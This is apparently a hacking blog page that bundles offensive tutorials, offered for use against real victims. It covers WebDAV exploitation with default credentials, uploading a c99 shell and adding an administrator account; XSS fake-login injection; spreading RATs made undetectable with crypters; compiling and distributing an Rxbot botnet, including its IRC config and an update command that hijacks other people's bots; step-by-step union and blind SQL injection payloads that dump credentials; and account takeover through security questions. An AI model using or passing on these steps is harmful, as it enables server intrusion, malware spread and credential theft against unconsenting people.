All Hack is here (Hack WebDAV & Deface)


Alright guy's today in this tutorial I'll be explaining how to use the webdav exploit. The link for the tools used for this tutorial can be found in the bottom of this tutorial. For those of you who do not know what a Webdav is here is the definition.
Web-based Distributed Authoring and Versioning, or WebDAV, is a set of extensions to the Hypertext Transfer Protocol (HTTP) that allows computer-users to edit and manage files collaboratively on remote World Wide Web servers.
But fo our purpose we will be using it to exploit RDP's or the Remote Desktop Protocal. For a better understanding of these with RDP's they could range from Vp's to Dedi's to just plain old home Pc's, but no matter what it is you will gain full access to the machine and can basically do whatever you want using a shell. For those of you who are new to the hacking scene a shell is a php script that allows you to view all of the files on the server you decide to host the shell on. The most common shells are the c99 or the r57, but in this case we will be using the c99. Now please be aware these are not the only shells available there are several posted throughout the forum and you can find them by simply using the search button located on the navbar. Now before being able to use the shell we have to find some vulnerable Ip's to gain access to for this we will be using the WebdavlinkCrawler which can be found in the webdav tools kit I have provided below here if you don't trust my download links simply don't download them it's that simple. Once you have managed to open the program you will be presented with this interface.
as you can see there is a Start, Stop, and Remove double. All of these terms will be explained later on, but what you are going to want to do is click the start button and it will being to search for the Ip's with webdav in them. Once you have managed to gather some ip's like you see in the picture here
Now please be aware this was only with about 15 seconds of searching and your results may differ depending on your connection speed as well as the amount of time you run the application. After you have all of your Ip's your going to want to click one so it's highlighted and the right click it you will be presented with a popup that looks like this
I have no idea what that actually means,(if someone would like to translate and tell me please feel free.) but what it is doing is copying all of the Ip's you have scanned. After you have scanned all of the Ip's your going to want to paste them in a new word document
once you have done so save it as something you can remember and put it in a convenient location. After you have saved your collected webdav Ip's in a word document your going to want to open the Ip Scanner in the folder. It will look like this
what your going to want to do is click the "Get Ip's" button and browse to your recently saved text file. After you have your ip's in place
your going to want to press the scan button what this is doing is now taking all of your Webdav Ip's and figuring out which one's are vulnerable to this particular exploit. The one's on the right are the ones it scanned and if you happen to get any in the middle those are the one's you can exploit. In my case this time I didn't happen to have any that were open to this exploit because I had a limited amount of Ip's. After you have managed to gather some ip's in the middle column and are ready to exploit the server you can just double check by going to the ip/webdav/ in your browser and Ip being one of the exploited ones you managed to get and your going to be looking for an index page that says Webdav Test page. After you have confirmed it is ready to go your going to want to open "map network drive" this can be found by either right clicking Network or my computer in the start menu.
what your going to want to click on is the hyperlink that reads " Connect to a website that you can use to store your document's and pictures. You will be presented with a screen all you have to do is click next. And the your going to want to click Choose a custom network location.
Now this is the important screen it should look like this
What you have to do is put the Ip/webdav in the text box and click next
you should then be prompted with a login box the default username is wampp and the default password is xampp. Once you have successfully connected you can now browse it's folder's so what you have to do now is just drag and drop the shell.php in side the main directory
After doing so go to ip/webdav/shell.php it should look like the following
Feel free to use that Ip if you are that much of a noob and cannot do anything for yourself. Once you are viewing your shell inside the execute textbox your going to want to do the following commands
net localgroup administrators SUPPORT /Add
What this is doing is making the remote desktop username SUPPORT and the password !password!. So now the last and final step is to open remote desktop and connect using the Ip and the login detail's we have just created. The shell is for you to explore and discover for yourself. Now you may be wondering What can you do once your in?

Answer : 1.You can do so much! Plant Rootkits/ Upload your RAT on the server:D
2. I upload my RAT’s incase they try to take back there dedi.
3. Host a web IRC bot or Shell Booter
4. Store files or host websites or shells
5. Make a Botnet!

TOOLS
http://dl.dropbox.com/u/18083172/Webdav%20tools.rar

How to Cross Site Scripting (XSS)

What is Cross Site Scripting?
Cross Site Scripting (or XSS) is one of the most common application-layer web attacks. XSS commonly targets scripts embedded in a page which are executed on the client-side (in the user’s web browser) rather than on the server-side. XSS in itself is a threat which is brought about by the internet security weaknesses of client-side scripting languages, with HTML and JavaScript (others being VBScript, ActiveX, HTML, or Flash) as the prime culprits for this exploit. The concept of XSS is to manipulate client-side scripts of a web application to execute in the manner desired by the malicious user. Such a manipulation can embed a script in a page which can be executed every time the page is loaded, or whenever an associated event is performed.
In a typical XSS attack the hacker infects a legitimate web page with his malicious client-side script. When a user visits this web page the script is downloaded to his browser and executed. There are many slight variations to this theme, however all XSS attacks follow this pattern, which is depicted in the diagram below.





A basic example of XSS is when a malicious user injects a script in a legitimate shopping site URL which in turn redirects a user to a fake but identical page. The malicious page would run a script to capture the cookie of the user browsing the shopping site, and that cookie gets sent to the malicious user who can now hijack the legitimate user’s session. Although no real hack has been performed against the shopping site, XSS has still exploited a scripting weakness in the page to snare a user and take command of his session. A trick which often is used to make malicious URLs less obvious is to have the XSS part of the URL encoded in HEX (or other encoding methods). This will look harmless to the user who recognizes the URL he is familiar with, and simply disregards and following ‘tricked’ code which would be encoded and therefore inconspicuous.

Site owners are always confident, but so are hackers!
Without going into complicated technical details, one must be aware of the various cases which have shown that XSS can have serious consequences when exploited on a vulnerable web application. Many site owners dismiss XSS on the grounds that it cannot be used to steal sensitive data from a back-end database. This is a common mistake because the consequences of XSS against a web application and its customers have been proven to be very serious, both in terms of application functionality and business operation. An online business project cannot afford to lose the trust of its present and future customers simply because nobody has ever stepped forward to prove that their site is really vulnerable to XSS exploits. Ironically, there are stories of site owners who have boldly claimed that XSS is not really a high-risk exploit. This has often resulted in a public challenge which hackers are always itching to accept, with the site owner having to later deal with a defaced application and public embarrassment.

The repercussions of XSS
Analysis of different cases which detail XSS exploits teaches us how the constantly changing web technology is nowhere close to making applications more secure. A thorough web search will reveal many stories of large-scale corporation web sites being hacked through XSS exploits, and the reports of such cases always show the same recurring consequences as being of the severe kind.

Exploited XSS is commonly used to achieve the following malicious results:
  • Identity theft
  • Accessing sensitive or restricted information
  • Gaining free access to otherwise paid for content
  • Spying on user’s web browsing habits
  • Altering browser functionality
  • Public defamation of an individual or corporation
  • Web application defacement
  • Denial of Service attacks
Any site owner with a healthy level of integrity would agree that none of the above can really be considered us frivolous or unimportant impacts on a vulnerable site. Security flaws in high-profile web sites have allowed hackers to obtain credit card details and user information which allowed them to perform transactions in their name. Legitimate users have been frequently tricked into clicking a link which redirects them to a malicious but legitimate-looking page which in turn captures all their details and sends them straight to the hacker. This example might not sound as bad as hacking into a corporate database; however it takes no effort to cause site visitors or customers to lose their trust in the application’s security which in turn can result in liability and loss of business.

XSS Attack Vectors
Internet applications today are not static HTML pages. They are dynamic and filled with ever changing content. Modern web pages pull data from many different sources. This data is amalgamated with your own web page and can contain simple text, or images, and can also contain HTML tags such as <p> for paragraph, <img> for image and <script> for scripts. Many times the hacker will use the ‘comments’ feature of your web page to insert a comment that contains a script. Every user who views that comment will download the script which will execute on his browser, causing undesirable behaviour. Something as simple as a Facebook post on your wall can contain a malicious script, which if not filtered by the Facebook servers will be injected into your Wall and execute on the browser of every person who visits your Facebook profile.

A practical example of XSS on an Acunetix test site.
The following example is not a hacking tutorial. It is just a basic way to demonstrate how XSS can be used to control and modify the functionality of a web page and to re-design the way the page processes its output. The practical use of the example may be freely debated; however anyone may see the regular reports which describe how advanced XSS is used to achieve very complex results, most commonly without being noticed by the user. I encourage also those individuals with no hacking knowledge to try the following example, I am sure you will find it interesting.

1. Load the following link in your browser: http://testasp.vulnweb.com/search.asp, you will notice that the page is a simple page with an input field for running a search

2. Try to insert the following code into the search field, and notice how a login form will be displayed on the page:

Please login with the form below before proceeding: <br><br>Please login with the form below before proceeding:
<form action="destination.asp"><table><tr><td>Login:</td><td><input type=text length=20 name=login></td></tr><tr><td>Password:</td><td><input type=text length=20 name=password></td></tr></table><input type=submit value=LOGIN></form>
then simply hit the search button after inserting the code.


Through the XSS flaw on the page, it has been possible to create a FAKE login form which can convince gather a user’s credentials. As seen in step 2, the code contains a section which mentions “destination.asp”. That is where a hacker can decide where the FAKE login form will send the user’s log-in details for them to be retrieved and used maliciously.

A hacker can also inject this code by passing it around via the browser’s address bar as follows:

http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3C form+action%3D%22test.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3Dtext+ length%3D20+name%3Dlogin%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3EPassword%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput +type%3Dtext+length%3D20+name%3Dpassword%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3Cinput+type%3Dsubmit+value %3DLOGIN%3E%3C%2Fform%3E

This will create the same result on the page, showing how XSS can be used in several different ways to achieve the same result. After the hacker retrieves the user’s log-in credentials, he can easily cause the browser to display the search page as it was originally and the user would not even realize that he has just been fooled. This example may also be seen in use in all those spam emails we all receive. It is very common to find an email in your inbox saying how a certain auctioning site suspects that another individual is using your account maliciously, and it then asks you to click a link to validate your identity. This is a similar method which directs the unsuspecting user to a FAKE version of the auctioning site, and captures the user’s log-in credentials to then send them to the hacker.

Why wait to be hacked?
The observation which can be made when new stories of the latest hacks are published is that the sites which belong to the large brands and corporations are hacked in exactly the same way as those sites owned by businesses on a much smaller budget. This clearly shows how lack of security is not a matter of resources, but it is directly dependant on the lack of awareness among businesses of all size. Statistically, 42% of web applications which request security audits are vulnerable to XSS, which is clearly the most recurring high-risk exploit among all the applications tested. The effort to raise awareness about how easy it is for an expert hacker to exploit a vulnerable application does not seem to be going too far. It is still very common to see the “We’ll see when I get hacked” mentality still lingering among site owners who finally risk losing a lot of money and also the trust of their customers. Anybody with the interest to research this matter will see how even individuals claiming to be security experts feel comfortable to state that XSS is over-rated and cannot really be used to achieve serious results on a web application. However further research will also prove that statistical figures speak for themselves, and those same statistics keep growing at a rate which will eventually overcast the claims of those incredulous “experts”.

Remote Administration Tool (RAT) Guide

Whats RAT?
A RAT is also a shortcut called Remote Administrator Tool. It is mostly used for malicious purposes, such as controlling PC’s, stealing victims data, deleting or editing some files. You can only infect someone by sending him file called Server and they need to click it.


How they work?
Some RATs can spread over P2P file sharing programs(uTorrent, Pirate Bay etc.), Messangers spams(MSN, Skype, AIM etc.).

Download?
Well you can find any type of RAT here, on sprawd-tutor.blogspot.com. To download.  and you will find some links. Also, you can buy FUD private version of RAT: Albertino RAT, Medusa Rat, jRAT etc. Also you will need DNS host for your RAT.


How do I control server?
Once installed, RAT server can be controlled via RAT client. From IP list box you choose PC and connect.


What do I need to setup RAT?
Well, you will need Windows OS, open port & RAT. To forward your port scroll for tutorial link or click this URL.

How do I port forward?
Port forwarding is easy and important for RAT. Well, you need open port because RAT connects through open port and bypass firewall. Open your web browser and write your IP and connect to your rooter(write Username: Admin & Password: Admin), open port forward page and write port you want and your IP. Well that’s all you need to do and now you got open port.


How do I make my server FUD?
If you want to make your server FUD again, you will need crypter(you can find free FUD one here.). Also, you can hex edit your server, but be careful some servers can crash after hex editing, any way check out this cool tutorial How to make FUD with hex editing.


How do I remove server if I infect myself?
When you infect yourself, first what you going to do is to connect to your PC. Some RATs have function to uninstall servers, well you click that and you uninstall it. Well there is another way, download MalwareBytes’ Anti-Malware and scan whole computer for Trojan.


Legal or illegal?
Well some RATs are legal, and some are not. Legal are the one without backdoor left, and they have abillity to close connection anytime. Illegal are used for hacking and they can steal data(Credit Cards, Passwords, private data etc.).




Legal :

TeamViewer – Access any remote computer via Internet just like sitting in front of it – even through firewalls.
UltraVNC – Remote support software for on demand remote computer support. VNC.Specializing in Remote Computer Support, goto my pc, goto assist, Remote Maintenance
Ammyy Admin – Ammyy Admin is a highly reliable and very friendly tool for remote computer access. You can provide remote assistance, remote administration or remote
Mikogo – Mikogo is an Online Meeting, Web Conferencing & Remote Support tool where you can share your screen with 10 participants in real-time over the Web.
 Illegal :
Spy-Net
Cerberus Rat
CyberGate Rat
SubSeven
Turkojan
ProRat

Download RAT : 



Where and how do I spread?
There are few different ways to spread your server. You can spread on warez websites, P2P file sharing websites(uTorrent, Pirate bay etc.), YouTube etc. Well some people use custom made Auto-Spreaders programs to spread their server. But best and most effective way to spread is when you FUD your server.


Whats DNS host?
The Domain Name System (DNS) is a hierarchical naming system for computers, services, or any resource connected to the Internet or a private network. It associates various information with domain names assigned to each of the participants. Most importantly, it translates domain names meaningful to humans into the numerical (binary) identifiers associated with networking equipment for the purpose of locating and addressing these devices worldwide.


What can RAT do?

• Manage files
• Control web browser(Change homepage, open site etc.)
• Get system informations(OS Version, AV name, Ram Memory, Computer name etc.)
• Get passwords, credit card numbers or private data etc.
• View and remote control desktop
• Record camera & sound
• Control mouse
• Delete, rename, download, upload or move files

What’s reverse Connection? 
A reverse connection is usually used to bypass firewall restrictions on open ports. The most common way a reverse connection is used is to bypass firewall and Router security restrictions.


Whats direct connection?
A direct-connect RAT is a simple setup where the client connects to a single or multiple servers directly. Stable servers are multi-threaded, allowing for multiple clients to be connected, along with increased reliability.


Can I get traced when I rat somebody?
Yes and no. Depends on victim, it is really hard to remove infection or even trace a hacker. There are tools like WireShark, but it’s really hard to trace, because PC usually got over 300 connections. So don’t worry.


Direct connection:

[Client]
|    [Client]
|      /
|     /
|    /
|   /
[Server]-----[Client]

How To Create And Compile Botnets To Autohack 1000ds of Systems

In addition to Rxbot 7.6 modded in this tutorial, you can also use another good source. It is rx-asn-2-re-worked v3 is a stable mod of rxbot and it is 100% functional and not crippled. If you want to download it, you can below:

Compiling is the same as it would be with Rxbot 7.6. I prefer this source but it would ultimately be best to compile your own bot/get a private one.


What is a botnet?
A botnet is where you send a trojan to someone and when they open it a "bot" joins your channel on IRC(secretly, they don't know this)Once done the computer is now refered to as a "zombie".
Depending on the source you used, the bot can do several things.
I myself have helped write one of the most advanced and secure bot sources out there.
(Off topic)
But once again depending on the source you can :
Keylog their computer, take picutes of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails, you can also spam, flood, DDoS, ping, packet, yada yada, some have built in md5 crackers, and clone functions to spamm other irc channels and overrun a channel and even perform IRC "Takeovers".
Once again depending on the bot it may be able to kill other fellow competeter bots.
Or even kill AV/FW apon startup.
Add itself to registry.
Open sites.
Open commands.
Cmd,
notepad,
html,
Anything is possible !

Theres the infected computers "bots" the attacker, the server, and the victim.


while the term "botnet" can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka "bot herder") can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC "bots". Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.
Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out "low profile DDoS attacks" and steal the CD keys for games, he explained. "They had a huge weapon and didn't use as much as they could have done," Santorelli told El Reg. "The main damage caused in the case is down to the cost of cleaning up infected PCs."

Botnets are being used for Google Adword click fraud, according to security watchers.

Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server. I will setup bots for people if they have something to offer.
---------------
Ignore anything about using the server editor but this tutorial show how to make an irc channel and spread bots:
Download tutorial


Here we go ladies and gentlemen
Follow the tutorial:

1. Setting up the C++ compilier : easy
Download : Microsoft Visual C++ 6.0 Standard Edition (63.4 mb)
Server 2
Server 3 (Direct Download)

Serial Key : 

812-2224558

Password : 

itzforblitz

2. Run setup.exe and install. Remember to input serial
3. Download and install the Service Pack 6 (60.8 mb)
4. After that Download and install: Windows SDK (1.2 mb)
Server 2
Server 3 (Direct Download)

Password : 


2. Configuring the C++ compilier (easy)

1. Open up Microsoft Visual C++ Compilier 6.0
2. Go to Tools > Options and Click the "Directories" tab
3. Now, browse to these directories and add them to the list: (Click the dotted box to add)
Quote:
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB

4. Now put them in this order: (use up and down arrows)


3. Configuring your bot: (easy)

1. Download and unpack:

2. You should see an Rxbot 7.6 folder
3. Open the Rxbot 7.6 > configs.h folder and edit these lines only:

char password[] = "Bot_login_pass"; // bot password (Ex: monkey)
char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)
char serverpass[] = ""; // server password (not usually needed)
char channel[] = "#botz_channel"; // channel that the bot should join
char chanpass[] = "My_channel_pass"; // channel password

Optional:
char server2[] = ""; // backup server
char channel2[] = ""; // backup channel
char chanpass2[] = ""; //Backup channel pass

4. Building your bot: (very easy)

1. Make sure Microsoft Visual C++ is open
2. Select "File > Open Workspace"
3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file
4. Right Click "rBot Files" and click Build:




5. rBot.exe will be in the Rxbot 7.6 > Debug folder !!!

YOUR DONE !!!! Now get the rbot and pack it (Use tool in third post and open rbot and click "Protect" and send it to some idiots, Follow tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY !

Command List :
Download Command List


Basics:
.login botpassword will login bots
.logout will logout bots
.keylog on will turn keylogger on
.getcdkeys will retrieve cdkeys.
Read command list for more

Download mIRC :
mIRC
Server 2
Server 3 (FTP)

How to secure your bots:

Don't be an ~censored~, it is easy to steal bots. All you need is the irc server address and maybe a key.
To steal bots, watch for the @login key one must upload their bot to a direct link (tdotnetwork is execellent)
and update the channel topic and run:
@update http://www.mybot.com/download/SMSPRO.exe 82


The http://mybot.com is your bot's download link and the 82 can be any number(s)

Now steal their bots and have them join your channel
To find the server address you need their botnet. Then take their bot and open it in the server editor. Address will be shown and so will password and other needed information.


To secure your self:

It is fairly easy to secure your bots, here is how:

1. When you are in your right click on your chat window and select "Channel Modes"
2. Make sure these options are checked:


This way no one besides you or another op can set the channel topic 
Note: Setting "Moderated" is good for when you are not there because anyone who is not voiced (+v) or and op (+o) cannot talk. They will still log in and follow commands however there will be no output.

Good IRC Servers:
I would recommend running your botnet on a private server. 
If you would like to setup a botnet on a certain server, do not intrude and make one. Talk to the admin and make sure he know that the IRC server is not doing anything illegal. If an Admin refuses, don't get angry. It is his/her server after all

[LIST] Hacked Streamyx Username / Password [LIST]

List 1 : 


List 2 

SQL Injection [Manual]

First of all: What is SQL injection?


A SQL injection is often used to attack the security of a website by inputting SQL statements in a web form to get a badly designed website in order to dump the database content to the attacker. SQL injection is a code injection technique that exploits a security vulnerability in a website's software. The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL commands are thus injected from the web form into the database of an application (like queries) to change the database content or dump the database information like credit card or passwords to the attacker. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
Using well designed query language interpreters can prevent SQL injections. In the wild, it has been noted that applications experience, on average, 71 attempts an hour. When under direct attack, some applications occasionally came under aggressive attacks and at their peak, were attacked 800-1300 times per hour.



1.SQL Injection (classic or error based or whatever you call it) big_smile

2.Blind SQL Injection (the harder part)


So let's start with some action big_smile


1). Check for vulnerability

Let's say that we have some site like this

http://www.site.com/news.php?id=5

Now to test if is vulrnable we add to the end of url ' (quote),

and that would be http://www.site.com/news.php?id=5'

so if we get some error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar

that means is vulrnable to sql injection smile

2). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result)

so how to use it? Well just incrementing the number until we get an error.

http://www.site.com/news.php?id=5 order by 1/*
http://www.site.com/news.php?id=5 order by 2/*
http://www.site.com/news.php?id=5 order by 3/*
http://www.site.com/news.php?id=5 order by 4/*

that means that the it has 3 columns, cause we got an error on 4.

3). Check for UNION function

With union we can select more data in one sql statement.

so we have

http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works smile

4). Check for MySQL version

http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try --
it's a comment and it's important for our query to work properly.

let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.

it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/*

if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."

i didn't see any paper covering this problem, so i must write it smile

what we need is convert() function

i.e.

http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
or with hex() and unhex()

i.e.

http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*
and you will get MySQL version big_smile

5). Getting table and column name

well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) 5 version.
we must guess table and column name in most cases.

common table names are: user/s, admin/s, member/s ...

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...

i.e would be

http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good big_smile)

we know that table admin exists...

now to check column names.


http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)

we get username displayed on screen, example would be admin, or superadmin etc...

now to check if column password exists

http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the database is set up smile

i.e md5 hash, mysql hash, sha1...

now we must complete query to look nice smile

for that we can use concat() function (it joins strings)

i.e

http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)

(there is another way for that, char(58), ascii value for : )


http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

now we get dislayed usernameassword on screen, i.e admin:admin or admin:somehash

when you have this, you can login like admin or some superuser big_smile

if can't guess the right table name, you can always try mysql.user (default)

it has user i password columns, so example would be

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like i said before i'm gonna explain how to get table and column names
in MySQL > 5.

For this we need information_schema. It holds all tables and columns in database.

to get tables we use table_name and information_schema.tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

here we replace the our number 2 with table_name to get the first table from information_schema.tables

displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

note that i put 0,1 (get 1 result starting from the 0th)

now to view the second table, we change limit 0,1 to limit 1,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.

for third table we put limit 2,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc... big_smile

To get the column names the method is the same.

here we use column_name and information_schema.columns

the method is same as above so example would be


http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

the first column is diplayed.

the second one (we change limit 0,1 to limit 1,1)

ie.


http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

the second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc... big_smile

if you wanna display column names for specific table use this query. (where clause)

let's say that we found table users.

i.e

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Note that this won't work if the magic quotes is ON.

let's say that we found colums user, pass and email.

now to complete query to put them all together big_smile

for that we use concat() , i decribe it earlier.

i.e


http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*

what we get here is userass:email from table users.

example: admin:hash:whatever@blabla.com


That's all in this part, now we can proceed on harder part smile


2. Blind SQL Injection

Blind injection is a little more complicated the classic injection but it can be done big_smile

I must mention, there is very good blind sql injection tutorial by xprog, so it's not bad to read it big_smile

Let's start with advanced stuff.

I will be using our example

http://www.site.com/news.php?id=5

when we execute this, we see some page and articles on that page, pictures etc...

then when we want to test it for blind sql injection attack

http://www.site.com/news.php?id=5 and 1=1

and the page loads normally, that's ok.

now the real test

http://www.site.com/news.php?id=5 and 1=2

so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.

1) Get the MySQL version

to get the version in blind attack we use substring

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

this should return TRUE if the version of MySQL is 4.

replace 4 with 5, and if query return TRUE then the version is 5.

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works

when select don't work then we use subselect

i.e

http://www.site.com/news.php?id=5 and (select 1)=1

if page loads normally then subselects work.

then we gonna see if we have access to mysql.user

i.e

http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1

if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.

3). Check table and column names

This is part when guessing is the best friend smile

i.e.

http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)

then if the page loads normally without content missing, the table users exits.
if you get FALSE (some article missing), just change table name until you guess the right one smile

let's say that we have found that table name is users, now what we need is column name.

the same as table name, we start guessing. Like i said before try the common names for columns.

i.e

http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

if the page loads normally we know that column name is password (if we get false then try common names or just guess)

here we merge 1 with the column password, then substring returns the first character (,1,1)


4). Pull data from database

we found table users i columns username password so we gonna pull characters from that.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

ok this here pulls the first character from first user in table users.

substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value

and then compare it with simbol greater then > .

so if the ascii char greater then 80, the page loads normally. (TRUE)

we keep trying until we get false.


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

we get TRUE, keep incrementing


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE again, higher

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

FALSE!!!

so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.

then let's check the second character.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

TRUE, the page loads normally, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

FALSE, lower number.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

TRUE, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

FALSE!!!

we know that the second character is char(105) and that is 'i'. We have 'ci' so far

so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).

There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing everything manually,

cause that makes you better SQL INJECTOR big_smile


Hope you learned something from this paper.


Have FUN! (:


Credits :
Cat- Devilcode

Hacking using the "Forgot Your Password"

This is the easiest to use by a normal hacker do his account of a trespass. Here all information and data collected will be dedicated to the process of returning the victim to guess the password security question (Secret Question) are usually not taken seriously by some individuals. Hackers enter all the data necessary to restore the password to the words and things that are easily available on the nature and behavior tingah victim either in terms of personality, hobbies and so on. Armed with the information obtained, the security question is often asked, such as date of birth, postcode and place of residence can be answered easily and thus can change the password of the victim. Although sometimes hackers can not answer the question correctly, they will try the next day because there are systems such as the Yahoo allows the user to enter 10 times after a failed attempt and making the system will block your account for 24 hours. So hackers will try to find the all the information that enables them to intrude into your personal account.

The Steps :




1. Find victim email :


2. Try "Forgot my Password"



3. Try Answer the Security Question :)
4. After you got the Email, Try reset the victim account .

0 ulasan: